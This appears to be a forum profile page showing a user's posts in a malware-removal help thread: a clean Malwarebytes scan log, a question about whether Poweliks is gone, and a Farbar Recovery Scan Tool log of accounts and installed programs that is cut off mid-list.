Jump to content

NighthawkAviation

Members
  • Posts

    11
  • Joined

  • Last visited

Reputation

0 Neutral

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Malwarebytes Anti-Malware www.malwarebytes.org Scan Date: 10/21/2016 Scan Time: 5:32 AM Logfile: Administrator: No Version: 2.2.1.1043 Malware Database: v2016.10.21.07 Rootkit Database: v2016.09.26.02 License: Trial Malware Protection: Enabled Malicious Website Protection: Enabled Self-protection: Disabled OS: Windows 10 CPU: x64 File System: NTFS User: Kyle Aniel Scan Type: Threat Scan Result: Completed Objects Scanned: 312180 Time Elapsed: 20 min, 1 sec Memory: Enabled Startup: Enabled Filesystem: Enabled Archives: Enabled Rootkits: Disabled Heuristics: Enabled PUP: Enabled PUM: Enabled Processes: 0 (No malicious items detected) Modules: 0 (No malicious items detected) Registry Keys: 0 (No malicious items detected) Registry Values: 0 (No malicious items detected) Registry Data: 0 (No malicious items detected) Folders: 0 (No malicious items detected) Files: 0 (No malicious items detected) Physical Sectors: 0 (No malicious items detected) (end) Does this mean Poweliks is gone?
  2. Ok I will instead. Addition_20-10-2016 15.04.45.txt FRST_20-10-2016 15.04.45.txt
  3. Additional scan result of Farbar Recovery Scan Tool (x64) Version: 17-10-2016 Ran by banie_000 (20-10-2016 15:02:31) Running from C:\Users\Kyle Aniel\Downloads Windows 10 Home Version 1607 (X64) (2016-09-16 12:11:12) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= Administrator (S-1-5-21-23814709-2432651133-2868963390-500 - Administrator - Disabled) banie_000 (S-1-5-21-23814709-2432651133-2868963390-1010 - Administrator - Enabled) => C:\Users\banie_000 DefaultAccount (S-1-5-21-23814709-2432651133-2868963390-503 - Limited - Disabled) Guest (S-1-5-21-23814709-2432651133-2868963390-501 - Limited - Disabled) => C:\Users\Guest Izach Aniel (S-1-5-21-23814709-2432651133-2868963390-1002 - Limited - Enabled) => C:\Users\Izach Aniel Kyle Aniel (S-1-5-21-23814709-2432651133-2868963390-1001 - Limited - Enabled) => C:\Users\Kyle Aniel ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AV: Anti-Virus and Anti-Spyware (Enabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Anti-Virus and Anti-Spyware (Enabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB} FW: Firewall (Enabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) µTorrent (HKU\S-1-5-21-23814709-2432651133-2868963390-1010\...\uTorrent) (Version: 3.4.8.42501 - BitTorrent Inc.) 757 American Airlines (One World livery) v1.03 (HKU\S-1-5-21-23814709-2432651133-2868963390-1010\...\757 American Airlines (One World livery) v1.03) (Version: - ) 757 American Airlines v1.01 (HKU\S-1-5-21-23814709-2432651133-2868963390-1010\...\757 American Airlines v1.01) (Version: - ) 777 Captain (777-200) 1.1 (HKLM-x32\...\x772) (Version: 1.1.00 - © 1999-2013 Captain Sim) Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.020.20039 - Adobe Systems Incorporated) Adobe After Effects CC 2015 (HKLM-x32\...\{147EC100-14BE-45EF-AB42-35BAEE7D02F0}) (Version: 13.5.0 - Adobe Systems Incorporated) Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.185 - Adobe Systems Incorporated) Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.8.158 - Adobe Systems, Inc.) Aerosoft's - Airbus A320-A321 - FSX (HKLM-x32\...\Airbus A320-A321 - FSX) (Version: 1.30 - Aerosoft) Airport Design Editor 170 (HKLM-x32\...\{FACD7476-0E32-4A35-9741-1049BE879267}) (Version: 1.70.6029.0 - ScruffyDuck Software) Apple Application Support (32-bit) (HKLM-x32\...\{FE5C2FAA-118D-4509-B51D-3F71CC9E1B3E}) (Version: 4.3 - Apple Inc.) Apple Application Support (64-bit) (HKLM\...\{2937FD88-C9D6-4B82-B539-37CD0A572F42}) (Version: 4.3 - Apple Inc.) Apple Mobile Device Support (HKLM\...\{2E4AF2A6-50EA-4260-9BA4-5E582D11879A}) (Version: 9.3.0.15 - Apple Inc.) Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.) Audacity 2.1.1 (HKLM-x32\...\Audacity®_is1) (Version: 2.1.1 - Audacity Team) Auto Clicker v2.2 (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\{C0A7E4F3-82CC-416B-82C6-BA06AACFD635}_is1) (Version: 2.2 - MurGee.com) Autodesk Application Manager (HKLM-x32\...\Autodesk Application Manager) (Version: 4.0.69.0 - Autodesk) Autodesk Download Manager (HKLM-x32\...\{C897D9EC-13C6-4A22-ABF7-33F2126A7DB6}) (Version: 3.0.8.0 - Autodesk, Inc.) AV Voice Changer Software Diamond 9.0 (HKLM-x32\...\AV Voice Changer Software Diamond 9.0) (Version: 9.0.30 - AVSOFT Corp.) Avidemux 2.6 - 64 bits (HKLM-x32\...\Avidemux 2.6 - 64 bits (64-bit)) (Version: 2.6.911.151222 - ) B787 for FSX (HKLM-x32\...\InstallShield_{04241DC8-98A4-41AC-A419-E23D6B401AA0}) (Version: 1.00.0000 - AeroSim Co.,Ltd.) B787 for FSX (x32 Version: 1.00.0000 - AeroSim Co.,Ltd.) Hidden Bandicam (HKLM-x32\...\Bandicam) (Version: 2.4.1.903 - Bandisoft.com) Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version: - Bandisoft.com) Blender (HKLM\...\{70DFC1C6-C234-4B4D-87C1-E01793AAB130}) (Version: 2.78.0 - Blender Foundation) BlueStacks App Player (HKLM-x32\...\BlueStacks) (Version: 2.5.61.6289 - BlueStack Systems, Inc.) Boeing 767-300 twelve repaints FSX & P3D (HKLM\...\{D2A24725-5F68-49B2-BF2F-07360D885699}) (Version: 1 - SkySpirit2010, Thomas Ruth, Emil Serafino) Boeing B737-823 Advanced VC FSX & P3D (HKLM\...\{330F6375-B0DB-4CDD-B1EB-B83C43810D11}) (Version: 1 - Project OpenSky, Alejandro Rojas Lucenda, FSRepaintsGER, Adam Murphy) Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.) Camtasia Studio 8 (HKLM-x32\...\{AF33D0D2-2627-4AC8-8473-FDBB7892129C}) (Version: 8.6.0.2079 - TechSmith Corporation) Captain Sim UHDT Base pack v1.02 (HKU\S-1-5-21-23814709-2432651133-2868963390-1010\...\Captain Sim UHDT Base pack v1.02) (Version: - ) CaptainSim 757-200 PRO 4.2 (HKLM-x32\...\{5B57D4F1-66BA-448C-97F1-23F73517C694}_is1) (Version: - komu) CASecureBrowser (HKLM-x32\...\{FA3C5DAC-79B6-493B-9613-0FF5760AAEE5}) (Version: 8.0.0 - AIR) CCleaner (HKLM\...\CCleaner) (Version: 5.12 - Piriform) Chrome Remote Desktop Host (HKLM-x32\...\{159AA592-31AA-4EAC-A6CB-B47AB2CB1476}) (Version: 52.0.2743.48 - Google Inc.) Convert AVI to MP4 (HKLM-x32\...\{9ECE13D2-C028-44CB-8A96-A65196E7BBE7}_is1) (Version: - convertavitomp4.com) CoolSoft VirtualMIDISynth 1.15.2 (HKLM-x32\...\CoolSoft VirtualMIDISynth) (Version: 1.15.2.0 - CoolSoft) Cyberlink PhotoDirector (HKLM-x32\...\InstallShield_{5A454EC5-217A-42a5-8CE1-2DDEC4E70E01}) (Version: 5.0.3.5715 - CyberLink Corp.) Cyberlink PhotoDirector (Version: 5.0.3.5715 - CyberLink Corp.) Hidden CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.7.4016 - CyberLink Corp.) CyberLink PowerDVD 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.4.4223 - CyberLink Corp.) CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 5.0.4.4218 - CyberLink Corp.) D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.4.0.0192 - Disc Soft Ltd) Debut Video Capture Software (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Debut) (Version: 3.01 - NCH Software) DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden DiscAuthor (x32 Version: 9.3.00 - Sony Corporation) Hidden EditVoicepack X (HKLM-x32\...\{493687F8-8D57-47C4-87B6-D46D7C5203BF}) (Version: 4.0.7 - Bevelstone Production) Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company) Evernote v. 5.3 (HKLM-x32\...\{E461B1AC-BC3C-11E3-B5B8-00163E98E7D6}) (Version: 5.3.0.3360 - Evernote Corp.) Express Burn Disc Burning Software (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\ExpressBurn) (Version: 5.06 - NCH Software) EZdok Camera for Microsoft Flight Simulator X (HKLM-x32\...\EZdok Camera for Microsoft Flight Simulator X) (Version: - ) f.lux (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Flux) (Version: - ) Family Protection (HKLM-x32\...\{08DE682A-3858-4591-9EBB-E5290E4DC3DD}) (Version: 2.6.116.1 - McAfee, Inc.) FeelThere E-Jets v.2 (HKU\S-1-5-21-23814709-2432651133-2868963390-1010\...\FeelThere E-Jets v.2) (Version: - ) Flight Simulator First Officer version 2.3 (HKLM-x32\...\{AF5E7C31-99DF-4218-8E52-F1B3FE3FD9A3}_is1) (Version: 2.3 - Flight Simulator Addons) Free Video Compressor (HKLM-x32\...\{01554C33-4131-4BC7-9E6D-AF85E02BDF4F}_is1) (Version: - freevideocompressor.com) FS Recorder 2.1 for FSX (HKLM-x32\...\{EB74294F-B8FC-4387-BEBF-275E36C6076C}) (Version: 2.1.0.0 - Matthias Neusinger) FS Water Configurator 3.15 (HKLM\...\FS Water Configurator) (Version: - ) FSDreamTeam GSX FSX (HKLM-x32\...\FSDreamTeam GSX FSX_is1) (Version: 1.8.4 - VIRTUALI s.a.s.) FSDreamTeam Los Angeles International FSX (HKLM-x32\...\FSDreamTeam Los Angeles International FSX_is1) (Version: 1.6.0 - VIRTUALI Sagl) FSFO version 2.0 (HKLM-x32\...\{64C6044E-CA51-47FF-99D7-A175399334CF}_is1) (Version: 2.0 - Flight Simulator Addons) FSX FSND MD 83 version 2 (HKLM-x32\...\FSX FSND MD 83 version 2) (Version: - ) FSX Mission Editor (HKLM-x32\...\{DF5EC16F-6C64-45F8-A6E5-6D5D1F6DB0CA}) (Version: 1.0.3824 - FSAddon) GIMP 2.8.18 (HKLM\...\GIMP-2_is1) (Version: 2.8.18 - The GIMP Team) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 53.0.2785.143 - Google Inc.) Google Earth (HKLM-x32\...\{2C44ABB9-8621-4EF5-AF34-0886DCDA7C21}) (Version: 7.1.7.2600 - Google) Google Earth Plug-in (HKLM-x32\...\{57BB4801-61C8-4E74-9672-2160728A461E}) (Version: 7.1.5.1557 - Google) Google Talk Plugin (HKLM-x32\...\{F9B579C2-D854-300A-BE62-A09EB9D722E4}) (Version: 5.41.3.0 - Google) Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden Gramblr (HKLM\...\Gramblr) (Version: 2.7.9 - Gramblr Team) Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden HitFilm 4 Express (HKLM\...\{B266DF92-432D-4985-91C3-70148568AB79}) (Version: 4.0.5422.10801 - FXHOME) Hoyle Puzzle and Board Games Classic (HKLM-x32\...\Hoyle Puzzle and Board Games Classic) (Version: - ) HP 3D DriveGuard (HKLM-x32\...\{13133E99-B0D5-4143-B832-AAD55C62A41C}) (Version: 6.0.19.1 - Hewlett-Packard Company) HP CoolSense (HKLM-x32\...\{ADE2F6A7-E7BD-4955-BD66-30903B223DDF}) (Version: 2.20.41 - Hewlett-Packard Company) HP Documentation (HKLM-x32\...\{3C7B723A-1108-455C-B65B-FF2251E1E5A3}) (Version: 1.1.0.0 - Hewlett-Packard) HP ENVY 7640 series Basic Device Software (HKLM\...\{24BF3898-2667-4645-9448-8C6765B801A5}) (Version: 34.2.117.50647 - Hewlett-Packard Co.) HP ENVY 7640 series Help (HKLM-x32\...\{5845A5C9-AA03-4D91-9793-1A2563CE0129}) (Version: 34.0.0 - Hewlett Packard) HP ePrint (HKLM-x32\...\{2794875B-6CCF-48B8-84A5-5B10DB98BEE6}) (Version: 14.0.14176.1823 - Hewlett-Packard) HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.7702 - HP) HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.7745.4851 - Hewlett-Packard) HP SimplePass (HKLM-x32\...\InstallShield_{314FAD12-F785-4471-BCE8-AB506642B9A1}) (Version: 8.01.11 - Hewlett-Packard) HP Support Assistant (HKLM-x32\...\{7FE016CC-DAA9-4E21-BD2F-98390D1E6F3F}) (Version: 7.6.23.8 - Hewlett-Packard Company) HP Support Solutions Framework (HKLM-x32\...\{55065080-504F-43BB-BE00-36B80D7D39A5}) (Version: 12.0.30.219 - Hewlett-Packard Company) HP System Event Utility (HKLM-x32\...\{8B4EE87E-6D40-4C91-B5E8-0DC77DC412F1}) (Version: 1.4.1 - Hewlett-Packard Company) HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard) HP Utility Center (HKLM\...\{DCD5C599-5CCC-4E37-8938-FBB548D780C6}) (Version: 2.5.3 - Hewlett-Packard Company) HP Wireless Button Driver (HKLM-x32\...\{30B2D1D8-0A07-4B71-9553-0710C5D31E35}) (Version: 1.1.2.1 - Hewlett-Packard Company) HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden iCloud (HKLM\...\{4B48E22A-2FB0-4EFA-B99E-954B1E50CD69}) (Version: 5.1.0.34 - Apple Inc.) IcoFX 2.12 (HKLM-x32\...\IcoFX 2_is1) (Version: 2.12 - ) iFly Jets - The 737NG for FS2004 (HKLM-x32\...\iFly Jets - The 737NG for FS2004) (Version: - ) iFly Jets - The 737NG for FSX (HKLM-x32\...\iFly Jets - The 737NG for FSX) (Version: - ) iFunbox (v3.0.3109.1352) (HKLM-x32\...\iFunbox_is1) (Version: v3.0.3109.1352 - iFunbox DevTeam) IHA_MessageCenter (HKLM-x32\...\{35AC3CFF-8021-4804-9967-4919A663128D}) (Version: 2.0.68 - Verizon) Inst5675 (Version: 8.01.11 - Softex Inc.) Hidden Inst5676 (Version: 8.01.11 - Softex Inc.) Hidden Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation) Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.23.1766 - Intel Corporation) Intel(R) PRO/Wireless Driver (HKLM\...\{ac7ad2d7-04b3-460c-b370-07e3d3e3aa4e}) (Version: 17.01.0000.1697 - Intel Corporation) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4360 - Intel Corporation) Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.9.1000 - Intel Corporation) Intel(R) Smart Connect Technology (HKLM\...\{51AC86D3-C431-48AD-9195-0D6C930D07CD}) (Version: 4.2.41.2710 - Intel Corporation) Intel(R) Virtual Buttons (HKLM-x32\...\1992736F-C90A-481C-B21B-EE34CAD07387) (Version: 1.0.0.14 - Intel Corporation) Intel(R) Wireless Bluetooth(R) 4.0 (HKLM-x32\...\{C9324B6F-FC2B-4CA0-8C42-793D7099BDA1}) (Version: 17.0.1422.02 - Intel Corporation) iTunes (HKLM\...\{A31C5565-90D9-4615-AE13-94D86C3836C7}) (Version: 12.3.3.17 - Apple Inc.) Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation) Java 8 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218045F0}) (Version: 8.0.450 - Oracle Corporation) Java 8 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218051F0}) (Version: 8.0.510 - Oracle Corporation) Java 8 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218060F0}) (Version: 8.0.600.27 - Oracle Corporation) Jed's Half-Life Model Viewer 1.3.6 (HKLM-x32\...\Jed's Half-Life Model Viewer) (Version: 1.3.6 - wunderboy.org) Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden Just Flight - 757 Jetliner - American Airlines (New) Livery Pack (HKLM-x32\...\{17F122A7-2F9B-4794-91F8-DF0FB253E74F}) (Version: 1.00.000 - Just Flight) Just Flight - 757 Jetliner Freemium (HKLM-x32\...\{B0F7B3B5-E856-4558-BD7C-BDA32943C783}) (Version: 1.00.000 - Just Flight) LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version: - ) Level-D 767-300 for FSX (HKU\S-1-5-21-23814709-2432651133-2868963390-1010\...\Level-D 767-300 for FSX) (Version: - ) Lightworks (HKLM-x32\...\{E94DD4E4-7746-472c-AA7B-1242FED0CFC8}) (Version: 12.6.0.0 - Lightworks) LiveWeb (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\{F0A7B33E-C872-42C8-B1A9-55450809DAFF}) (Version: 4.00 - Shyam Pillai) Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes) McAfee Virtual Technician (HKLM-x32\...\McAfee Virtual Technician) (Version: 7.6.0.202 - McAfee, Inc.) McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.279 - McAfee, Inc.) McDonnell Douglas DC-10 Version 2 FSX & P3D (HKLM\...\{0D9F34DB-535D-4FA2-B622-D03B6F479EBE}) (Version: 1 - Thomas Ruth and Erick Cantu, sounds by Dennis Vormberge) MergeModule_x86 (x32 Version: 9.3.00 - Sony Corporation) Hidden Microsoft Expression Encoder 4 (HKLM-x32\...\Encoder_4.0.1651.0) (Version: 4.0.1651.0 - Microsoft Corporation) Microsoft Expression Encoder 4 Screen Capture Codec (HKLM-x32\...\{952DCCD8-4039-46C8-BC8B-5C1EB6C8E130}) (Version: 4.0.1651.0 - Microsoft Corporation) Microsoft Flight Simulator SimConnect Client v10.0.60905.0 (HKLM-x32\...\{D1AC9B0B-2727-4811-91DC-1FC3C4E47A9B}) (Version: 10.0.60905.0 - Microsoft Corporation) Microsoft Flight Simulator SimConnect Client v10.0.61259.0 (HKLM-x32\...\{D61CA184-3F6D-4A50-B2CC-7A18447D6A8D}) (Version: 10.0.61259.0 - Microsoft Corporation) Microsoft Flight Simulator X Service Pack 2 (HKLM-x32\...\{4847BBB9-EADD-4C92-90BF-4223B0892FF6}) (Version: 10.0.61472.0 - Microsoft Game Studios) Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.3.188.0 - Microsoft Corporation) Microsoft Office Home and Student 2016 - en-us (HKLM\...\HomeStudentRetail - en-us) (Version: 16.0.7369.2038 - Microsoft Corporation) Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation) MidiEditor (HKLM-x32\...\D4338446-FFE6-1A12-ACFF-CB6F6A6A70A1) (Version: 3.0.0 - Markus Schwenk) Movavi Video Editor 11 (HKLM-x32\...\Movavi Video Editor 11) (Version: 11.1.0 - Movavi) Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden Mozilla Firefox 44.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 44.0.2 (x86 en-US)) (Version: 44.0.2 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 44.0.2 - Mozilla) MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation) MultitrackStudio Lite 8.1.3 (64-bit) (HKLM\...\MultitrackStudio64_is1) (Version: - Bremmers Audio Design) Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7369.2038 - Microsoft Corporation) Hidden Office 16 Click-to-Run Extensibility Component 64-bit Registration (Version: 16.0.7369.2038 - Microsoft Corporation) Hidden Office 16 Click-to-Run Licensing Component (Version: 16.0.7369.2038 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7369.2038 - Microsoft Corporation) Hidden Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version: - ) OpenAL (HKLM-x32\...\OpenAL) (Version: - ) OpenShot Video Editor (HKLM-x32\...\{C55769E7-0B81-4E22-B5CE-805506E6B6B2}) (Version: 2.0.7 - OpenShot Studios, LLC) Oracle VM VirtualBox 5.1.6 (HKLM\...\{EEDDD7E2-A7A2-4FA9-8C32-ADB29A5096FF}) (Version: 5.1.6 - Oracle Corporation) paint.net (HKLM\...\{A1D05314-DC32-4668-A97E-51060EC8BCCE}) (Version: 4.0.12 - dotPDN LLC) PlayMemories Home (HKLM-x32\...\{94F4815B-755A-4FFA-AFDC-EE8FE776981E}) (Version: 4.3.00.04171 - Sony Corporation) PMB_ModeEditor (x32 Version: 9.3.00 - Sony Corporation) Hidden PMB_ServiceUploader (x32 Version: 9.3.00 - Sony Corporation) Hidden PMDG 737 8900 NGX (HKLM-x32\...\{20708FD5-E94D-4097-A21E-E28564CDBC06}) (Version: 1.00.2888 - PMDG Simulations, LLC.) PMDG 777-200LR/F Base Package FSX (HKLM-x32\...\{0F16340B-5B5B-4531-8D87-4952E3BCA6E6}) (Version: 1.10.6320 - PMDG Simulations, LLC.) PMDG 777-300ER Expansion (HKLM-x32\...\{E65EFDE6-0864-40BA-8DDF-E31F736D9000}) (Version: 1.10.6320 - PMDG Simulations, LLC.) POSKY Boeing 777-200 Pack FSX & P3D (HKLM\...\{684D778C-02D2-437D-AAEA-A2648B01AA93}) (Version: 1 - Project Open Sky) Prism Video File Converter (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Prism) (Version: 2.62 - NCH Software) PRO-ATC/X version 1.2.2.6 (HKLM-x32\...\PRO-ATC/X_is1) (Version: 1.2.2.6 - ) Product Improvement Study for HP ENVY 7640 series (HKLM\...\{9913BFAE-5E18-4863-8354-452337781573}) (Version: 34.2.117.50647 - Hewlett-Packard Co.) Python 3.5.1 (32-bit) (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\{c39d559b-aa83-4476-ba20-988a35a1199a}) (Version: 3.5.1150.0 - Python Software Foundation) Python 3.5.1 Core Interpreter (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden Python 3.5.1 Development Libraries (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden Python 3.5.1 Documentation (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden Python 3.5.1 Executables (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden Python 3.5.1 Launcher (32-bit) (HKLM-x32\...\{17778F7B-FB5A-4A93-9719-D75BAF673498}) (Version: 3.5.150.0 - Python Software Foundation) Python 3.5.1 pip Bootstrap (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden Python 3.5.1 Standard Library (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden Python 3.5.1 Tcl/Tk Support (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden Python 3.5.1 Test Suite (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden Python 3.5.1 Utility Scripts (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden qBittorrent 3.3.7 (HKLM-x32\...\qBittorrent) (Version: 3.3.7 - The qBittorrent project) QualityWings Ultimate 757 Collection FSX (HKLM-x32\...\QualityWings Ultimate 757 Collection FSX_is1) (Version: 1.3.2 - QualityWings) Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.273.40 - Realtek Semiconductor Corp.) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.24.1218.2013 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7548 - Realtek Semiconductor Corp.) Remote Desktop assistant (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\b948d155e8353e01) (Version: 1.0.0.102 - Remote Desktop assistant) S2 version 1.8 (HKLM-x32\...\3712C137-820D-48BE-83B2-DE57BC51343F_is1) (Version: 1.8 - Parallax, Inc.) Safari (HKLM-x32\...\{C779648B-410E-4BBA-B75B-5815BCEFE71D}) (Version: 5.34.57.2 - Apple Inc.) SBACSecureBrowser (HKLM-x32\...\{157D208A-3283-46B2-B038-54F9BA4688E3}) (Version: 8.1.0 - AIR) ScriptVOX Studio 